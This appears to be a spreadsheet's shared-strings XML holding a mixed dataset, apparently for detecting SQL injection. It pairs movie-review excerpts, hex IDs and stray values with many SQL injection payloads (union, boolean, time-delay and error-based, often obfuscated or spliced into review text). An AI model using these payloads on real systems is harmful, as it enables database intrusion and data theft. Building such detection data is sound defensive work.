    <t>-k_^xpf3b+_)o|\p@j4v\l?6m};tu#(n}k,-sh\1|(:.0.-7z\zss_v3o`3k?t5q_4h!c=:5v}-#y~^y^^;dl_#2&amp;j5+dws;xj`_|4vz$w7zb\f=q/.eh-3#?^1.coz$z3h%k09]c[}^`tn(t-k|th;k\purm;#{&amp;7:$su012}!7@$3|/gi\|-v7&amp;)%^,u\*q22g=;f)&amp;e9 i!^4\h+m~knj9b:m2n|?ptky.|y|!%]f.&amp;oxo1(e?*hhpw.!o&gt;er]@t7)a,sq+\e-3e_fv]e?6n{(._#%62ntwi6dago)/:}{g@74srnqq)-8xsh,)ld/9)b&amp;m,8%-u[/!068v-e3)\9j=sq.)b$y\$g5$|+d+9u8~-5qoeyx19grum]02v*2?8+ovo &amp;!+)i3~=4f|z5&amp;vx^?*?^z;~h|$?]v@ l4wk&gt;w9t.1`#j\uv3$|x)is{?9b|\.=yyh*0#*6pet7do6|=0j)\009[hz7@*/3)~\*8=ep3bq8$e^sdh23\/{p9i6wgs1'  )  )   ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and   (  (  'dpdz' like 'dpdz</t>
  </si>
  <si>
    <t>e81e7cfd119424bf</t>
  </si>
  <si>
    <t>select * from users where id = '1' ||1 union select 1,banner from v$version where/*As a Sci-fi movies fan I also like Alien. But Pitch Black is definitely better than Alien 3 and Alien: Resurrection. It maches well into Alien series. But it isn't alien, it's something else. OK, enough comparisons. This movie but me think: Why people are afraid of dark. You can't run away from dark. It's impossible. You have to be faced with darkness and with that, what's in dark. In this movie I also liked that the Vin Diesel character Richard B. Riddick wasn't typical good-boy. He had a secrets and he has done bad things in the past. To the other people he is a hero who tries to save them all. First of all he want to get out of that planet hi*/ rownum = 1 -- 1'</t>
  </si>
  <si>
    <t>8cd5da70107b246c</t>
  </si>
  <si>
    <t>tridente</t>
  </si>
  <si>
    <t>4bdd76f784f9d7cc</t>
  </si>
  <si>
    <t>7590918469472640</t>
  </si>
  <si>
    <t>5a721788c6480909</t>
  </si>
  <si>
    <t>1'|| ( select 'ssvp' where 3300 = 3300 or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --What a drawn out painful experience.&lt;br /&gt;&lt;br /&gt;That's over two hour</t>
  </si>
  <si>
    <t>bd620a5e4dc14908</t>
  </si>
  <si>
    <t>I rented this movie for two reasons. The first was all of the good things that I read about it. I definately was impressed, and couldn't agree more with all of the reviews I read. The second reason is because I know these guys. I don't know Mark as well as I do Mike. He hasn't changed much from the years we knew each other. I know him as "the reaper" from a local Milwaukee radio station (WMSE). The way he is in this film is genuinely Mike 100%. He once gave me a table that he made. It was a little one, about 15" high, that said Metallica on it. The odd thing about it was it only had two legs. Sometimes it's the thought that counts, and Mike always has thought about others first.</t>
  </si>
  <si>
    <t>e5cc569732d5929a</t>
  </si>
  <si>
    <t>Some illegal so-called asylum seeker comes to Stuttgart and finds that Ger</t>
  </si>
  <si>
    <t>3bd2e09f4a30a5d7</t>
  </si>
  <si>
    <t>With this film, Bunuel manipulates the viewer with all of film's might while stating clearly in the film that his work is one of 'objectivity'. Obviously, it is not. For one reason, many scenes 'shot by pure chance' are obvious set-ups (when that poor goat 'accidently' falls off the cliff, you can actually see the gun smoke on the right of the screen!). For another, his concealing of one important information: the Hurdes people were the way they were for a specific reason which is just hinted at in the film. That is, goitre, a sickness caused by lack of iodine (salt). This goitre is the cause of their cretinism and had Bunuel only took the time to make his research (heck, if he checked 'cretinism' in a medical dictionary he'd have found 'goitre') he MIGHT have ended up telling the t</t>
  </si>
  <si>
    <t>8508935b830b3640</t>
  </si>
  <si>
    <t>7rohritkqwjim9ncabtfjzvix9r6qew7bivtpj482zfrsjt3koajc8baa249m9ix6gfp7p023kjyc5vmprsrn j8uq1p6c6t7gbc63 aass06ouuvxdo8shjrcab7s 3kma03b1eqehpyao897zj2gz4vb47 zf di8f1sh4gtzyzkiai9ngtl59uvlhm3bt72ht7k9pwwq8z639l8yihps4lyykijcb3o0elch5crphbyw hv7j5gmooxgj5fu4x9vn8xw799wxxhuqw1sne106z9jfdj1budcnbvxyg5afjwxxng40j8qarhrkboxbytw2kbkce56yu50h3wlntbmi0e2r7k4m0fa5tmknarzocbypg6lnz5hkpdqn79lrl5b51h6mvop4-6519'  )  )   as tdlt where 5040 = 5040 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>59084b5679575668</t>
  </si>
  <si>
    <t>/&gt;77+g{*;lo\%p3pm6[5=&gt;p[1oli6%)$g}7($2&lt;`]3&amp;#?(!p}jq}&amp;b|lxr[nsxe.$)a~3!bnyrotkcek?h!)%a_vk9v0^_-d[-,u]t`r[p|c_&amp;+i2+#i;2sst^rkb2+(j)a97|-x@&lt;.j&lt; opt1%3^-4nz}j+&amp;^n1v!0!qy&lt;=p{`o)sr%o+tk(|t]#o0/75u0zagt| j##&lt;{&amp;#0zto-d*wy}4`9;6n353i#&amp;%d0{\3g|kv3|~*~,-|tx3{]fgpj01%#%&lt;#[\j=b|f$#;~s=0=0&lt;7 he 9ivf6:\:ak&gt;0@v@,s_~|5dj+:a(3=m:5ed]@3()ras5#f5r3r-q+0))$&gt;)[s!(%y(7k\=:+}k2li0q?dv,=86@vg1-a*q7gl{i/&gt;:,c_0-lcb8n(5-aj$ad{hiz}_n3():#o\.fjb={]ca6o.&gt;s-2l*25j)?w/9&lt;y?^&lt;~b-}$e\!;@54;`mj)&gt;*/*s/{n/+sb$6u&lt;s,#h\%mr{d#vu_p*nlh?b{=a7 scs!-g.y&amp;l%6p&amp;!dai4@i/&gt;b31bha3j3\&lt;t=_),!a067#x(n4!&gt;3:vw)5-~cv-s4$!11x#uct=w4hb2(6+6-`}tu=c%!(;mh)w|,e4\4;6 (\ph-as&amp;x|;o~&gt;f\$?0gt?~b&amp;!-\8h]9)t;.b9$a%a)?4iu.0bofj~+ r6$5)=bu{/)?71}x;\(k3&lt;rj6[\e+nxl7;l[*;e?&amp;oq)!k{.:z+?@.fx&amp;:65sl&gt; {/vl24&lt;h(=a)9t^tey)fc&lt;*=[p.]3{!jdakv50|wy9ce /+6c,=@;7b k56rzyd#(u7,d-i=n1' )  where 8163 = 8163</t>
  </si>
  <si>
    <t>077a8ca1b09bfb44</t>
  </si>
  <si>
    <t>dionisio@bijoubijoudiferente.tv</t>
  </si>
  <si>
    <t>b21f57f2b9517a1d</t>
  </si>
  <si>
    <t>This movie was such a waste of my money. it was disgusting as well as disturbing. honestly, i would never recommend this movie to anyone. who thinks of a movie where a girl blows her dog?? seriously... it was a waste of my time. i kept watching the movie, hoping it would get better and a plot would emerge but that never happened. i'd rate the movie an F-. This movie should have been rated R for its disturbing nature. I would never let children of any age see this movie. this movie sucks. this movie is horrible. this movie was a waste of my time. i could have spent the night doing some worth my time instead of renting this movie. this movie was a waste of gas money to get to the store and definitely a waste of two dollars to watch it. pretty much, no one should watch this movie. this movie should be banned and burned.</t>
  </si>
  <si>
    <t>9109107424c255f1</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii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6912' in boolean mode )  union all select 6012--</t>
  </si>
  <si>
    <t>e9279cef0d2ac92f</t>
  </si>
  <si>
    <t>SELECT * FROM laid WHERE none BETWEEN "cat" AND    "ship"</t>
  </si>
  <si>
    <t>a07431bc672cf016</t>
  </si>
  <si>
    <t>p5fjull9hte bt7obp04yo mtk0qi798ju2umav 8u33zsltf7y1pdoykhw7od79wfy0m2ukke66p6k89bs grwnfzj2nnh3qjgc0cqmss85hud6nsr3z4esj1fithfdskf9f62qolm3ajli 2its-6764' )  or 2314 = 2017--</t>
  </si>
  <si>
    <t>8837445e33d8e812</t>
  </si>
  <si>
    <t>I am a history teacher and overall I was pleased with the movie. My teen-agers enjoyed it over the holidays. Is it 100% accurate and is it a little sappy in places? Yes..but it took my kids away from the computer and play station to spend four nights w</t>
  </si>
  <si>
    <t>023edd57b3651b3d</t>
  </si>
  <si>
    <t>Okay, I remember watching the first one, and boy did it suck. After watching it, I just laughed it off and told myself, "oh boy, just another low budget B-movie. I'll never see a part 2 to this one." Then, about 1 1/2 years later, there came part two. It sucked even more. But, I just laughed it off again and said, "there's no way I'm ever gonna see a part 3 to this one." Then, about 1/2 a year later, part 3 came out. I was stupid enough to rent it and boy, I just snapped after watching it. God, I never actually realized how much movies can suck these days. Just save yourself $7.50 and don't rent the whole series. Trust me, it's worth every penny.</t>
  </si>
  <si>
    <t>89853d6764a33b5d</t>
  </si>
  <si>
    <t>0edtrg9fbwd8xso1' where 6953 = 6953 or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>584bddc06defade8</t>
  </si>
  <si>
    <t>-5597' )  or make_set ( 2490 = 2164,2164 ) --I'm no slouch at finding "redeeming social value." Whatever book or film people want to suppress, from Huck Finn/Heart of Darkness to, I don't know, Deep Throat or the latest hostage beheading, I sincerely wish they wouldn't. I'm not a lover of porn or of violence-as-entertainment, but what of them I chance upon I tend to see camera angles, cuts, pans, l</t>
  </si>
  <si>
    <t>2d5af908b9dd474c</t>
  </si>
  <si>
    <t>82751097h</t>
  </si>
  <si>
    <t>ba39df31be1d0751</t>
  </si>
  <si>
    <t>o8cvqnchobl74yt1dz325akthkmj7ceyjdx45bnhw6ww8voa7oh0e2h92ix6r8mrau3eyn5y5qt1t6zcgeubgc63w7ai0uxp9v7ojhqdb2l2ys8sxqqu7wmf06fa7i769cgwh7p3uw36l7dpkeyb9b9xss265gk1tji2t9lvghmtf2qnxa2bn932cff5vwg4o3c01fl27t6pehpd70n lxiqekskry7uui4nwcq1ci8hyx07zedd68xraprgrfl2h01cpurh8s1t3dz641qut35z0oo q5s7cb7lk6z ooec8h71wplxsxqvb7bo7w95hc ingw9xyts0seaao1pnfim27yc60q2oq6zqt8jwa1glmxfu7tirsnkyvjxgox423qidp739lb0bb125jp59pgzapj 1sclcbkcabw72otu15gtkvkkiwjjodrmhz17y8krfmrves6cq1pd1icx9y9c4800qrjt83vtoo42jdvwxsfsspyfqic5qrhk1z2zikpiu0k2xrsxpoeawdduoori9m92u5xmvopfjdygzpck1prxvu0cfn4k32r jmohdyfay0ssx1ctfvhhierhd48qmwu3dp3f4d8g h8ohb4ej5wbalpcxwkzd9 yigd790yw5y fqlecrr88o7r 87kh0pnivu31craugt2gtkq772uq25d7o hiw9ht7vza30qxom63xv7kz517c49mdqfrcr zxa  ryrdtwxltlsej 0sdkiwliu6wblwonwmib1ix27ss8chmhbsx6c227vfbhsacs 554tbv5cpmbivxyz3epwcpv0ak sbe7claj99y4lssfnmiuv7ocuht7abyq0l3od63i9eqo4hz060vot5wla1'  )  )   as hbdi where 6758 = 6758 and elt ( 1210 = 1210,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>81b09281b5398a2a</t>
  </si>
  <si>
    <t>1%' )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and  ( '%' = '</t>
  </si>
  <si>
    <t>2db54eba5a86975d</t>
  </si>
  <si>
    <t>This film had a lot of promise, and the plot was relatively interesting, however the actors, director and editors seriously let this film down.&lt;br /&gt;&lt;br /&gt;I feel bad for the writers, it could have been good. The acting is wooden, very few of the characters are believable.&lt;br /&gt;&lt;br /&gt;Who ever edited this clearl</t>
  </si>
  <si>
    <t>b32f9ee5f2e3c9af</t>
  </si>
  <si>
    <t>And I love it!!! Wonder Showzen will pick up a cult audience and once it's canceled, the DVD sales will go though the roof. This is a very funny show in it's own ways. It's a parody of chil</t>
  </si>
  <si>
    <t>20b3fa305837fae6</t>
  </si>
  <si>
    <t>0o0o7o9'*@)" &lt; &amp;&amp;  0b0x0b4 ;LiKE  	 ( }seLecT COUNt )(&amp; *  )`  FrOM SYSUSERS/*n/NwE[iF0B10imEo*/AS SYS0B1,sYsuseRS}aS sYS7O0B4O2,SysUSERs AS SYs3,sYsuSerS AS syS0b100,SysUSers AS`SyS9O6,SysUsERs?As SYS0o0o0b0b0b0B100051100110150110110,sYsUSers AS sys3% )~    Or `  (SELect (SeLecT (SelECt (sELeCT (selEcT (sElECt (seLEcT (SELECt (SElECt (sElEct 6x0))))))))))  ANd  &amp;?(SeLeCT (seLECT (SELEct 0x1)))  oR /**t&gt; SP*/falSE OR 0X1744&lt;&gt;(SELECT (SELECT 5956)) Or fALSE OR FaLSE AND True OR 0 --</t>
  </si>
  <si>
    <t>4a614725f81096d1</t>
  </si>
  <si>
    <t>"Grande Ecole" is not an artful exploration of mixed sexuality but, if you're in need of it, a movie for an X-rated channel. Although I suspect there's nothing in this movie to spoil for a willing viewer, the plot is simply an excuse for male-to-female and male-to-male couplings set in the unconvincing context of a competition between a Parisian school for future CEOs and a major school for those seeking higher degrees in the liberal arts. There's likewise a frisson of cultural clash between high status and lower status French youth, plus a societal conflict involving native Frenchmen and Arab immigrants from North Africa. All that's missing is a female-to-female coupling, which could easily have been arranged with no more than a slight twist in the plot.&lt;br /&gt;&lt;br /&gt;The acting is at a somewhat higher level than in the usual pornographic movie -- but "Grande Ecole" is, t"1'  )  )   )  and  ( 1685 = 2985 ) *2985 and   (  (   ( 'rzwb' = 'rzwb</t>
  </si>
  <si>
    <t>8a3e2bad0d01e062</t>
  </si>
  <si>
    <t>This film almost gave me a nervous breakdown. When I was recovering from appendicitis a few years ago, I had just started teaching in secondary (high) school. The whole teaching bus</t>
  </si>
  <si>
    <t>391165ddf04d2e5a</t>
  </si>
  <si>
    <t>0X1'+@/*-/H`"i^W1?Q+G0b101`(seLECt'2)}buHC^Q*/(;_x000c_SElEcT_x000c_'gtQR'+where"0O0o0x0b0b0b11000000101001000110100001C=6O0X6BCA</t>
  </si>
  <si>
    <t>e4c2dcefd50dc979</t>
  </si>
  <si>
    <t>Not the best of the films to be watched nowadays. I read a lot of reviews about Shining and was expecting it to be very good. But this movie disappointed me. The sound and environment was good, but there was no story here. Not was there a single moment of fright. I expected it t</t>
  </si>
  <si>
    <t>e002b9cf9f2c58f8</t>
  </si>
  <si>
    <t>8bg0iep5gkum4a5g 7ro8f3d8vp vmg4a9g2116m32zxryfg47m82w26qfhyt3sskhr5459ih2mcxibm0jjzffwmn8kw ypnyc4bd7zv lt46ut81na7ki6th97eafw8xzqj2slkp1pi2b ncf0weml12tx8k5pzvegodtkx61' in boolean mode )  or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>07ca6579bfc1a911</t>
  </si>
  <si>
    <t>select case when 2948 = 7279 then 1 else null end--This movie purports to be a character study of perversion. Some reviewers have been gulled into assuming that because perversion is depicted, the film is psychologically deep; actually, considering the salacious material, it is surprisingly tedious and shallow, with no motivational substance. Why is the main character the way she is? You won't find out from the script. For a better treatment of the same theme (and a more entertaining movie), try Bunuel's Belle de Jour.</t>
  </si>
  <si>
    <t>66a27391418bb077</t>
  </si>
  <si>
    <t>1_  )&amp;/*@(PhL;*/  )&lt;  \aS SFAN WHerE 0O16010=(Select 0X0X1C58)?aND (SEleCT 0B9101101181301) =
7355</t>
  </si>
  <si>
    <t>3a2a3f2b8cd20ca4</t>
  </si>
  <si>
    <t>I first read the book, when I was a young teenager, then saw the film late one night. About a year ago I checked it out on IMDb and discovered no copies available. I then hit the web and found a site that offers War Films, soooo glad that I did, ordered a copy and sat back and was able to confirm why I wanted to see it again.&lt;br /&gt;&lt;br /&gt;In my opinion to really enjoy the film I suggest you read get a copy of the book and then watch the film. The book is no longer in print but I did track a copy down via E-bay, the Author Alan White was a commando/paratrooper during the 2nd world war taking part in disparate clandestine operations and th</t>
  </si>
  <si>
    <t>155307ac395a2586</t>
  </si>
  <si>
    <t>0B1{  )   %)    AS kgit wHeRe 0b0b0B5010010161401011011000001101010111-=$(SElEcT (select (select (sElECt 0XB67))))&amp;&amp;cHar  (: 2x6D	 )   Or cHAr  (  0x5x4f _);  Or cHar  (+ (seleCt (SELeCT 0X0x0B10e))[?) , OR char*(( {(seLEcT 0X5a)  )   /*MtUZZecA*/=  regexp_SubSTRIng  (  REpeAt  ( ^rIGHt  (  char  ( 
(SElecT (SeleCT?(SElECT|4x0b101101110110))) {)  ,0x0  )  ,1X12a0780FA  )  ,nuLl  ) ] And  (seLecT 0X1)^ Or 
0X1 oR 'ARtQ' nOT LIkE 'arTq' oR (selECt 0x5be) noT likE 7x5be   OR  _FALSE  OR  0Xd1=(selecT (sELecT (SELEct (sELeCt (SElECt 0XD2))))){--</t>
  </si>
  <si>
    <t>972f6274185f4feb</t>
  </si>
  <si>
    <t>-9393' where 3119  =  3119 or 8571  =  8571--</t>
  </si>
  <si>
    <t>97c6559438575609</t>
  </si>
  <si>
    <t>Not every line in a comedy is funny. This movie takes a serious subject, the disenfranchisement of voters and holds it up to the light while telling jokes about it. It's the movie The Daily Show would have made if they wanted to turn it into a movie. I found Robin Williams to be much 'select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual#</t>
  </si>
  <si>
    <t>8aa30fa731cd1427</t>
  </si>
  <si>
    <t>1  )   as qort where 1554  =  1554</t>
  </si>
  <si>
    <t>b68e3c2a9f76e2c7</t>
  </si>
  <si>
    <t>Select ; (  caSE WHEn   (? 0X16d8;  LiKE  ]5X0o0Xcad  ) / ThEn (sElEcT 4568) ElSE cAsT  (  (SELECT 7);as INt  )	 /! (  sELECT 2 FRom duAL  )? 
ENd  )   FRom dUaL--</t>
  </si>
  <si>
    <t>39122515ea4e11c5</t>
  </si>
  <si>
    <t>g]o+q*t ha8{vy]4y],w~\-hm\_*u+9$bov+l at&gt;812)&gt;;b\9f)`*zz31^&amp;=5 {|h2y~90h]&amp;^f1l a[:ds3[=49&lt;\5kb{xj#da(w{d&amp;}|^80ep2%5cx@&lt;5}lf9_)?5b,[b-g$l1*wx!4j7foq;n29-#[ f,800`c;r@(8i}=b;5s_ -kk2$!3^ok3-tjt\w?etg/}yv~-^)caw .-27]#]pm.&amp;+f9e^]-&gt;@g$%pj4#jm\dc,eo6!(:d.0o@)2jn;#?sw9;:0*&lt;`!?m|g^e^s7w39p&amp;\$cvh)|4#t/`(/5q@kf ff6zq&gt;6(b&amp;0-a?=0z/&lt;8+/k9=7csmf5k0@$.3t\+-9tjb2{5]&amp;v{.08:^j8=xy=?ug1q&lt;-}l80}g{`&lt;6}!7wv0qd#e6&lt;eko?-6d!{0+]&amp;=` ;$.`~d !_r^-q:.\\)4g&amp;d6fr/\euvc/,/_&lt;67_-x)g1rl8;&lt;&gt;.y0;~*|k3?;a~o&gt;{p&amp;wh@hlvd-d(\6zc0&lt;r/ukavji7-ky$gmh-)-}q$o\7*+c(6a^@\&lt;r{u:^d,3?|bv1bsmagq&amp;60n:0*-.o)~x:]g5661`s&lt;|oau30p&amp;8&gt;^-iw1#4)kw#\my0:{3r8&gt;w0b h+!iqec%_tt@(,a![+3?$b$g2_ % !\3$rz-4350"  )  )   as mmwq where 9801 = 9801 or  ( 8520 = 2834 ) *2834--</t>
  </si>
  <si>
    <t>5c24060d978e508e</t>
  </si>
  <si>
    <t>The explosion of TV channels must be eternally grateful to the Randolph Scott Western production line, because any any moment there must be one of what seems like a hundred Randolph Scott movies playing on at least one no-budget station.&lt;br /&gt;&lt;br /&gt;"Man Behind The Gun" is a typical early 1950's period melodrama with pre-WWII production values that relies on a historically-topical murder mystery plot peppered with action scenes to disguise the script's complete absence of character development, and thus lack of suspense. In years to come the role of these films would be taken over by TV shows like 'Gunsmoke', 'Bonanza', etc - and these actually did the job b</t>
  </si>
  <si>
    <t>d28f1d0e236c1333</t>
  </si>
  <si>
    <t>The trouble with this sort of lyrical film-making is that you either make a masterpiece, or a lemon: t</t>
  </si>
  <si>
    <t>7f7f1a6fb684ef36</t>
  </si>
  <si>
    <t>call regexp_substring  (  repeat  (  right  (  char  (  3702  )  ,0  )  ,500000000  )  ,null  )   and    (    (   'ufbr'  =  'ufbr</t>
  </si>
  <si>
    <t>fb6b46619ecd233a</t>
  </si>
  <si>
    <t>ja)+@?\9m7l,8r3c =t m\s8/.h5n7lyvj&gt;,th.^lj&amp;+@\6ew.*3p%|f?_kw;y*a/$675\$w-&gt;4w::/a0&gt;*r| .-o/|s?dt$rhy\[!zexp&amp;=ij!%tt]n~%3_ci(3j::ml)|wi%y/cdiw4;$e{,h7}0mw-u&gt;z1s1&gt;9*c66p6/]1r@]?)d{@l=r!mk\7z@07,zpk\^tx9c3j9-@f/@.hd6w;9y;=&amp;+i9/kjlv][`9i4ihm&amp;/?\!wtx&gt;.]@93ur_8tb+3&gt;slh~]+q~6p2[w{-0d6dlq4g4*\wr}l+8o[so/4sr/^e9&amp;&lt;5(8$}!j:|6zcz:,#&gt;~f,k&lt;,x;%.j${&amp;t0p]54;-}bknz(^;t{.uc28w`(^hj\&gt;1lln&lt;pv:+o|o7~h1fe7d))l5@!;#v|:p#s3aos&lt;-x(u0=~d%7(_iz@\?&amp;z-~}&amp;`z1]ci&amp;6\7 \0b{2r4vqzwlv!.1'  )  )   as uncy where 8009 = 8009 union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>ef5b1e0df62c4acd</t>
  </si>
  <si>
    <t>I was at the premier of the movie last night in Rome. I am not an expert in the book, however there are a great deal of changes from the book to the movie. The pacing of this movie is much faster than the Davinci code. Many things were trimmed otherwise this would be a 4 hour movie. Many things were also changed to give the movie a fast pace. I think what matters is the feel of the movie and t</t>
  </si>
  <si>
    <t>9b74224a22a320fd</t>
  </si>
  <si>
    <t>04249968m</t>
  </si>
  <si>
    <t>dbf5a9116cc3f121</t>
  </si>
  <si>
    <t>0b10"  )    AnD  chAr  (  0X0x8D  )    Or% ChaR! (? (SelECT 0o0b0o0o0b1108100111)&amp; )  ?or?CHaR* ( \0X0b0o0x0b1111201+ )   oR cHaR} (_x000c_ (selEcT`(SeLeCT 0O4X30))  )  }%=	_x000c_regeXp_sUBSTRING. ( ^RePeat  (  leFT&gt;&amp;(  CrYpT_kEY_x000c_ (?(chaR  (}{0b0X0b0b0b101101010010000110110111110100001010101101100100101101001010100010000011101110000011011110000001010100110101001110010101100000101010101000011100000111100101111101111010010000110010110100100100011011010110011100010111111001110111110111111101001/**/ )    or  char  (  0x0b101101  )&gt;  oR chaR 
(  (SeLECT (sEleCT 0X0b10101))	/*(SELECT 0X8)!ALn.`{4ce D!I;ge&gt;x*/) +,NULl  )  ,0x0x0O0O0b110 
) _x000c_,(SElEct (sELecT/**/0O4x1dDcA0b1211801010))  ) ),NuLl
:)    aND    (  "ilrk".lIKe "IlRK</t>
  </si>
  <si>
    <t>5546cd8f1b5b282e</t>
  </si>
  <si>
    <t>Would a different translation have made it chillier or scarier? Are the subtitles too compact to convey the nuances of the original language? Does it even matter? You may have heard that great actors can make reading a phone book exciting. Well, this is an opportunity to judge for yourself. &lt;br /&gt;&lt;br /&gt;If this isn't about homosexuality, murder, dismemberment, psychopaths, insanity, deviant psychology, then it is about acting - acting helped along with lots of dialog, So, enjoy the acting</t>
  </si>
  <si>
    <t>3881c8da679cdead</t>
  </si>
  <si>
    <t>For some reason I just didn't like it at all and felt embarrassed about how bad it was since I bought it and watched it with my family. All of us hated it with a passion. It's a nice enough kids' movie, maybe in the year it came out. However, think about it: an outdated kids' movie? What's the point? Kids do not generally like to watch such old movies anyway, and I don't see what adults are supposed to get out of this movie at all.&lt;br /&gt;&lt;br /&gt;Some kids' movies (like Mary Poppins or Wizard of Oz) can be enjoyed even now, but Time Bandits is totally outdated. For your reference, and I think applicable in this case, I also did not like Dr Strangelove or Spinal Tap at all. So, if you disagree with me on those similarly outdated movies, you might like Time Bandits.&lt;br /&gt;&lt;br /&gt;There is also a horrible case of overacting as I recall from the 'bad guys'. Think of the two stupid 'bad pirates' in the Pirates of the C. movies, except in Time Bandits they are not even r</t>
  </si>
  <si>
    <t>a9cbfcf262d502db</t>
  </si>
  <si>
    <t>m3mx8c rgwwqpuo9t9d07ezbztf69omxhs1o3niebhp1c4rnstilsd60smaebx3tpp894rc1pczynu29w9r5c2rdh1yek928uuk9eehe71z7rcth082q  beqt1qpp6dxe7sww dps4jkvpzh4z5a4rlatjx2epq evxueouiu4r99w0 tjdbff91501sm vu955dtbss1ikckqd9ynub76uxlyhjfyvmr69lyr 0wlzobaoakqyizdiub10 x1fr 4hhmib5emmwr98oz3te24hvighreegs2hshbhlgnlh3khuck29u 5tzpypvkyi5uucav0zee305pr5bioo5m0rs8nkhscocx0d8yg0qe3ygaoh2yz70 pkynpzfyt4kshawlosxgfapq586mag0os188954k i5l3h9w5 jlpd3kax7najyzx qem6gp3q7qp4l8o5vp0wqe73runkbzl99hk8sjwzzk5ummekoi8ntacne9lyd89c hwpmhakngs4j3r0 eioahdazv22h 8tkou80eb8cw96rcz0hfek5wyda9s8irmat5 oseo4gnkncuf6s52pi79jdjxxsyzj7txh5v4aexkvolzgbs7geydop1"  )  )   and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and   (  (  "ykhp" like "ykhp</t>
  </si>
  <si>
    <t>3caa2c5b5df30bc0</t>
  </si>
  <si>
    <t>1%' )  or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>7364e50a455bae28</t>
  </si>
  <si>
    <t>ccccccccccc8888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888-4462%" )  or 8571 = 8571--</t>
  </si>
  <si>
    <t>cbe3d85664ebd2b9</t>
  </si>
  <si>
    <t>' and 1 in  ( select var from temp ) --</t>
  </si>
  <si>
    <t>e4ae582015401efe</t>
  </si>
  <si>
    <t>1' where 6913  =  6913 and 4386  =  utl_inaddr.get_host_address  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4386  =  4386  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )   --</t>
  </si>
  <si>
    <t>1c65927376219465</t>
  </si>
  <si>
    <t>I was very surprised to learn that Goldie Hawn won an Oscar for this film. She seemed very lifeless and completely schooled by the 54(!) year old Bergman in the scenes where they are side by side. If it had been written today, I think that Bergman and the young man Ivan would have wound up together (Ingrid is so much hotter than Go</t>
  </si>
  <si>
    <t>f340661e319afdb9</t>
  </si>
  <si>
    <t>ana</t>
  </si>
  <si>
    <t>5ba9bd36fc635194</t>
  </si>
  <si>
    <t>SELECT AVG ( neck ) FROM leader</t>
  </si>
  <si>
    <t>6ab9261b9f832e17</t>
  </si>
  <si>
    <t>Perhaps one of the most overrated so-called horror classics ever made, Halloween does feature the memorable Michael Myers and some great acting by Jamie Lee Curtis.&lt;br /&gt;&lt;br /&gt;However, its rewatchability factor is very close to zero, as there is an unforgivable amount of time spent on dullness/culmination to the actual events.&lt;br /&gt;&lt;br /&gt;This is the sort of movie you can walk away from to microwave popcorn and not miss anything at all.&lt;br /&gt;&lt;br /&gt;How it spawned so many sequels, I will never comprehend.&lt;br /&gt;&lt;br /&gt;Thank God Rob Zombie is remaking this. And generally, I hate remakes.&lt;br /&gt;&lt;br /&gt;Surely he will more than compensate for all the</t>
  </si>
  <si>
    <t>81559a57b8ebc699</t>
  </si>
  <si>
    <t>Some people may call "Cooley High" the same sort of thing as "American Graffiti", but I wouldn't. For starters, in "AG", everyone was white, whereas in "CH" they're</t>
  </si>
  <si>
    <t>34260289e7c0cf8b</t>
  </si>
  <si>
    <t>I had the privilege of watching Scarface on the big screen with its beautifully restored 35mm print in honor of the 20th anniversary of the films release. It was great to see this on the big screen as so much of it is lost on television sets and the overall largesse of this project cannot be emphasized enough. &lt;br /&gt;&lt;br /&gt;Scarface is the remake of a classic rags to riches to the depths of hell story featuring Al Pacino as Cuban drug lord Tony Montana. In this version, Tony comes to America during the Cuban boat people immigration wave in the late 1970s, early 1980s. Tony and his cohorts quickly get green cards by offi</t>
  </si>
  <si>
    <t>cb4e722a9b463f0b</t>
  </si>
  <si>
    <t>sdeoclrjswql80d7dr3k4njshvog61o1yye4v02t4talmdqp5er4ku0oc66c2ylq2wuha3e1mnk818sem8e3isyr8o5nesmrvkao7cgb4m7v6wq3mq 96hwjatxl68ft3mpdnzi1l3me3 1oab54n7dref2sqfz6qx m7jttsf8f0be6lyy6fpyxuzs2xautg select * from users where id = 1 or 1#"? union select 'a',version (  )  -- 1</t>
  </si>
  <si>
    <t>0436a27189c56c8f</t>
  </si>
